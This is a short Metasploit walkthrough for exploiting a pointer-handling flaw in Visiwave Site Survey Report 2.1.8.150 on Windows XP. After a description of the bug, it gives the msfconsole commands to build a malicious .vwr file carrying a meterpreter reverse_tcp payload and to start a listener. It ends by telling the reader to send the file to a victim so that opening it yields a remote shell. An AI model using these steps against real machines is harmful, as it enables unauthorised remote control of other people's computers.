This module exploits a vulnerability found in Visiwave Site Survey Report application. When processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the 'Type' property (valid ones include 'Properties', 'Title Page', 'Details', 'Graph', 'Table', 'Text', 'Image'), but if a match isn't found, the function that's supposed to handle this routine ends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10] instruction. This allows attackers to overwrite it with any arbitrary value, and results code execution. A patch is available at visiwave.com; the fix is done by XORing the return value as null if no match is found, and then it is validated before use. NOTE: During installation, the application will register two file handles, VWS and VWR and allows a victim user to 'double click' the malicious VWR file and execute code. This module was also built to bypass ASLR and DEP.
Exploit Targets
Visiwave 2.1.8.150
Windows XP SP2
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/fileformat/visiwave_vwr_type
Msf exploit (visiwave_vwr_type)>set payload windows/meterpreter/reverse_tcp
Msf exploit (visiwave_vwr_type)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (visiwave_vwr_type)>exploit
After we successfully generate the malicious File, it will stored on your local computer
/root/.msf4/local/msf.vwr
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
exploit
Now send your msf.vwr files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.
